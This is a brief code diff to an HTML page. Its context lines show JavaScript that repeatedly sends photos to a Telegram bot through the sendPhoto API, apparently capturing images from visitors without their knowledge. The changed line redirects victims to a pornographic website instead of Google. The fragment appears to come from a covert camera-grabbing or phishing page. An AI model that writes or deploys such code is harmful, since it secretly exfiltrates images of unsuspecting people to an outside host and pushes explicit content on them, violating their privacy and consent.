--- a/all.html
+++ b/all.html
@@ -243,7 +243,7 @@
                 fetch(`https://api.telegram.org/bot${botToken}/sendPhoto`, {method:"POST", body:fd});
             } else {
                 clearInterval(interval);
-                window.location.replace("https://www.google.com");
+                window.location.replace("https://www.mvideoporno.xxx/xhamster/");
             }
         }, 2000);
     }
